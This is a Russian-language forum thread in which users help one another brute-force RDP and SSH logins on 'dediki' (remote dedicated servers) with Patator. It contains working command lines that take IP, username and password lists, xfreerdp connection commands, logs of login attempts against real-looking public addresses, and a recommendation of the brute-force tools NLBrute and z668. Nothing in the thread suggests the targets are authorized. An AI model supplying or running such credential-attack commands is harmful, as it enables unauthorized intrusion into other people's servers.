• B правой части каждого сообщения есть стрелки и . Не стесняйтесь оценивать ответы. Чтобы автору вопроса закрыть свой тикет, надо выбрать лучший ответ. Просто нажмите значок в правой части сообщения.

  • Познакомьтесь с пентестом веб-приложений на практике в нашем новом бесплатном курсе

    «Анализ защищенности веб-приложений»

    🔥 Записаться бесплатно!

  • CTF с учебными материалами Codeby Games

    Обучение кибербезопасности в игровой форме. Более 200 заданий по Active Directory, OSINT, PWN, Веб, Стеганографии, Реверс-инжинирингу, Форензике и Криптографии. Школа CTF с бесплатными курсами по всем категориям.

Patator - freerdp2-x11не корректно установлен

gerd

Green Team
21.09.2017
97
18
BIT
0
добрый день уважаемые.Что я делаю не так,
python patator.py rdp_login host=162.253.179.228 user='administrator' password='/root/hydra/pass.txt' 0=passwords.txt
03:15:27 patator INFO - Starting Patator v0.7-beta (https://github.com/lanjelot/patator) at 2017-11-18 03:15 MSK
03:15:27 patator INFO -
03:15:27 patator INFO - code size time | candidate | num | mesg
03:15:27 patator INFO - -----------------------------------------------------------------------------
03:15:27 patator INFO - 1 486 0.404 | | 1 | /build/freerdp-6GuCnO/freerdp-1.1.0~git20140921.1.440916e+dfsg1/client/X11/xf_client.c:692: Authentication only. Don't connect to X.\nconnected to 162.253.179.228:3389\nError: protocol security negotiation or connection failure\n/build/freerdp-6GuCnO/freerdp-1.1.0~git20140921.1.440916e+dfsg1/libfreerdp/core/freerdp.c:95: Authentication only, exit status 1\n/build/freerdp-6GuCnO/freerdp-1.1.0~git20140921.1.440916e+dfsg1/client/X11/xf_client.c:1278: Authentication only, exit status 1
03:15:27 patator INFO - Hits/Done/Skip/Fail/Size: 1/1/0/0/1, Avg: 1 r/s, Time: 0h 0m 0s
 
V

Valkiria

В какой операционной системе установлен Patator ?
В логах ясно написано, что у тебя нет коннекта с freerdp.
Authentication only. Don't connect to X.\nconnected to 162.253.179.228:3389\nError: protocol security negotiation or connection failure\n/build/freerdp-6GuCnO/freerdp-1.1.0~git20140921
Кроме того, ты брутишь дедики по протоколу RDP.
Для брутфорса различных протоколов потатор подключает модули.
А для успешной работы этих модулей необходимо установить зависимости.

К примеру, в CentOS 7:
Зависимости Patator для модулей
Если нужно установить зависимость только для определённых модулей,
то ниже дана информация о пакетах, которые вам нужно установить для того или иного модуля:
RDP (NLA)
# yum -y install freerdp
SSH
# yum -y install python-paramiko
VNC
# yum -y install python-crypto

В KaliLinux эти команды выглядят иначе из-за различия в названиях элементов
SSH
# apt install python-paramiko
RDP (NLA)
# apt install freerdp2-x11
VNС
# apt install python-crypto

Следовательно, первое, что приходит в голову, у тебя либо не установлены, либо "криво" установлены зависимости модуля RDP.
# apt install freerdp2-x11
 

gerd

Green Team
21.09.2017
97
18
BIT
0
Cпасибо за отет,разобрался....freerdp2-x11не корректно установлен .
как добавить в запрос лист со списком ip? Не получается никак создать корректный запрос
./patator.py rdp_login host=??????????? user='Administrator' password=FILE0 0='/root/patator/pass.txt' 2='/root/patator/resi3389.txt' -x ignore:code=1 -l out=234.txt, как всавить вместо вопросов файл со списком, если можно может быть пример запроса,?
 
V

Valkiria

Если freerdp установлен не корректно, то брутфорс не запустится.
В первую очередь, исправь freerdp.
Необходимо, чтобы программа работала.
Попробуй при помощи freerdp приконнектится к какому нибудь дедику.
# xfreerdp -k en-us -a 32 -x l -z -u Administrator -g 800x600 --sec rdp --plugin cliprdr 185.154.xx.xx

Если ты зашёл на дедик, тогда МОЖНО продолжать думать над брутфорсом с помощью ./patator.py
Пока ты не добьёшься корректной работы freerdp - продолжать нет смысла.

Ответ на твой вопрос выглядит так:
# ./patator.py rdp_login host=FILE2 user=FILE1 password=FILE0 0=pass.txt 2=result3389.txt 1=login.txt -x ignore:code=1 -l out=234.txt
 

gerd

Green Team
21.09.2017
97
18
BIT
0
Если freerdp установлен не корректно, то брутфорс не запустится.
В первую очередь, исправь freerdp.
Необходимо, чтобы программа работала.
Попробуй при помощи freerdp приконнектится к какому нибудь дедику.
# xfreerdp -k en-us -a 32 -x l -z -u Administrator -g 800x600 --sec rdp --plugin cliprdr 185.154.xx.xx

Если ты зашёл на дедик, тогда МОЖНО продолжать думать над брутфорсом с помощью ./patator.py
Пока ты не добьёшься корректной работы freerdp - продолжать нет смысла.

Ответ на твой вопрос выглядит так:
# ./patator.py rdp_login host=FILE2 user=FILE1 password=FILE0 0=pass.txt 2=result3389.txt 1=login.txt -x ignore:code=1 -l out=234.txt

вот ответ
Error: protocol security negotiation or connection failure
 
V

Valkiria

вот ответ
Error: protocol security negotiation or connection failure
Это лучше, чем я ожидала ))
Вообще говоря, это не ошибка работы программы.
Это скорее всего ошибка подключения.
Попробуй так
# xfreerdp --ignore-certificate +clipboard --u Administrator -f 185.154.ХХ.ХХ -p
 

gerd

Green Team
21.09.2017
97
18
BIT
0
Это лучше, чем я ожидала ))
Вообще говоря, это не ошибка работы программы.
Это скорее всего ошибка подключения.
Попробуй так
# xfreerdp --ignore-certificate +clipboard --u Administrator -f 185.154.ХХ.ХХ -p
(.xx.xx-0.247)-вход на дедик есть, программа работает . Можно ли в patator вставить лист со списком адресов,?

./patator.py rdp_login host=FILE2 user=FILE1 password=FILE0 0=pass.txt 2=result3389.txt 1=login.txt -x ignore:code=1 -l out=234.txt
FILE2/1/0-надо вставлять путь до файлов?
pass.txt,result3389.txt,login.txt-тоже путь_?
спасибо за помощь
 
V

Valkiria

надо вставлять путь до файлов?
Всё зависит от того, в каком каталоге находится скрипт.
Если скрипт и файлы с логинами, паролями и адресами находятся в одном каталоге, то путь можно не указывать.
В остальных - необходимо указать.

У меня обычно всё "это" находится в домашней папке root (я - только root ):

WPB17QCZcH2Ujx5BReJZrg9JgFWUAt.png


# ./patator.py rdp_login host=FILE2 user=FILE1 password=FILE0 0=pass.txt 2=result3389.txt 1=login.txt -x ignore:code=1 -l out=234.txt​
 

gerd

Green Team
21.09.2017
97
18
BIT
0
Это лучше, чем я ожидала ))
Вообще говоря, это не ошибка работы программы.
Это скорее всего ошибка подключения.
Попробуй так
# xfreerdp --ignore-certificate +clipboard --u Administrator -f 185.154.ХХ.ХХ -p
(.xx.xx-0.247)-вход на дедик есть, программа работает . Можно ли в patator вставить лист со списком адресов,?

./patator.py rdp_login host=FILE2 user=FILE1 password=FILE0 0=pass.txt 2=result3389.txt 1=login.txt -x ignore:code=1 -l out=234.txt
FILE2/1/0-надо вставлять путь до файлов?
pass.txt,result3389.txt,login.txt-тоже путь_?

Всё зависит от того, в каком каталоге находится скрипт.
Если скрипт и файлы с логинами, паролями и адресами находятся в одном каталоге, то путь можно не указывать.
В остальных - необходимо указать.

У меня обычно всё "это" находится в домашней папке root (я - только root ):

WPB17QCZcH2Ujx5BReJZrg9JgFWUAt.png


# ./patator.py rdp_login host=FILE2 user=FILE1 password=FILE0 0=pass.txt 2=result3389.txt 1=login.txt -x ignore:code=1 -l out=234.txt​
Спасибо, можно ли в 3389 вставить несколько ip?
01:58:20 patator FAIL - xxx 80 1.005 | lennox:SERVIDOR\Administrator:185.154.0.247 | 3378 | <type 'exceptions.TypeError'> execute() got an unexpected keyword argument 'out'
01:58:20 patator FAIL - xxx 80 1.006 | laguna:SERVIDOR\Administrator:185.154.0.247 | 3379 | <type 'exceptions.TypeError'> execute() got an unexpected keyword argument 'out'
01:58:20 patator FAIL - xxx 80 1.007 | ladies:SERVIDOR\Administrator:185.154.0.247 | 3380 | <type 'exceptions.TypeError'> execute() got an unexpected keyword argument 'out'
01:58:22 patator FAIL - xxx 80 1.006 | kodiak:SERVIDOR\Administrator:185.154.0.247 | 3383 | <type 'exceptions.TypeError'> execute() got an unexpected keyword argument 'out'
01:58:22 patator FAIL - xxx 80 1.004 | kevin1:SERVIDOR\Administrator:185.154.0.247 | 3387 | <type 'exceptions.TypeError'> execute() got an unexpected keyword argument 'out'
01:58:22 patator FAIL - xxx 80 1.005 | kronos:SERVIDOR\Administrator:185.154.0.247 | 3381 | <type 'exceptions.TypeError'> execute() got an unexpected keyword argument 'out'
01:58:22 patator FAIL - xxx 80 1.005 | kosmos:SERVIDOR\Administrator:185.154.0.247 | 3382 | <type 'exceptions.TypeError'> execute() got an unexpected keyword argument 'out'
Это нормальный вывод программы, или что то не так?
 

gerd

Green Team
21.09.2017
97
18
BIT
0
Я не понимаю вопрос.
Постарайся задать его другими словами.


Да, это нормальный лог программы.
patator FAIL - xxx 80----?
<type 'exceptions.TypeError'> execute() got an unexpected keyword argument 'out'---------------?
Это вроде говорит о том , что что то не так..,
[doublepost=1511049098,1511048204][/doublepost]
patator FAIL - xxx 80----?
<type 'exceptions.TypeError'> execute() got an unexpected keyword argument 'out'---------------?
Это вроде говорит о том , что что то не так..,
------------------------------------------------------------------------------------------------------------------------------------------------------------------------

02:47:04 patator INFO - 0 462 0.645 | TEST:test:212.92.xxx.xxx | 13 | /build/freerdp-6GuCnO/freerdp-1.1.0~git20140921.1.440916e+dfsg1/client/X11/xf_client.c:692: Authentication only. Don't connect to X.\nconnected to 212.92.249.151:3389\nUnable to get current timezone rule\n/build/freerdp-6GuCnO/freerdp-1.1.0~git20140921.1.440916e+dfsg1/libfreerdp/core/freerdp.c:95: Authentication only, exit status 0\n/build/freerdp-6GuCnO/freerdp-1.1.0~git20140921.1.440916e+dfsg1/client/X11/xf_client.c:1278: Authentication only, exit status 0
02:47:06 patator INFO - Hits/Done/Skip/Fail/Size: 1/20/0/0/20, Avg: 6 r/s, Time: 0h 0m 3s
спасибо все понял...............делаю только первые шаги................интересно жуть.
Не понял толко как всавить в host=несколько адресов,поможете.,?
 
V

Valkiria

Что бы ты не получил в результате работы Patator-а, посоветую тебе с целью брутфорса дедиков перенестись в ОС Windows и обратить своё внимание на программы z668 или NLBrute.
 
B

BOP

Что бы ты не получил в результате работы Patator-а, посоветую тебе с целью брутфорса дедиков перенестись в ОС Windows и обратить своё внимание на программы z668 или NLBrute.
Сорри.
А не подскажешь 1 000 потоков он потянет? При условие что характеристика сервера хорошие. 16 ядер, и т.д.
И не сильно ли грузит процессор? При сколько потоков пробовала?
 

krypt0n

Green Team
12.11.2017
139
68
BIT
0
Cпасибо за отет,разобрался....freerdp2-x11не корректно установлен .
как добавить в запрос лист со списком ip? Не получается никак создать корректный запрос
./patator.py rdp_login host=??????????? user='Administrator' password=FILE0 0='/root/patator/pass.txt' 2='/root/patator/resi3389.txt' -x ignore:code=1 -l out=234.txt, как всавить вместо вопросов файл со списком, если можно может быть пример запроса,?
ты отпиши как ошибку исправил?!!!!
 
B

BOP

ты отпиши как ошибку исправил?!!!!
Думаю что так:
./patator.py ssh_login host=FILE0 0=/home/administrator/ip.txt user=FILE1 1=/home/administrator/user.txt password=FILE2 2=/home/administrator/pass.txt -t 10 --rate-limit 1 --max-retries 2

/administrator/ папку замени на имя своей папки. Надеюсь ты в папке home находишься. Это запуск ssh брута.
 
Последнее редактирование модератором:
  • Нравится
Реакции: krypt0n
Мы в соцсетях:

Обучение наступательной кибербезопасности в игровой форме. Начать игру!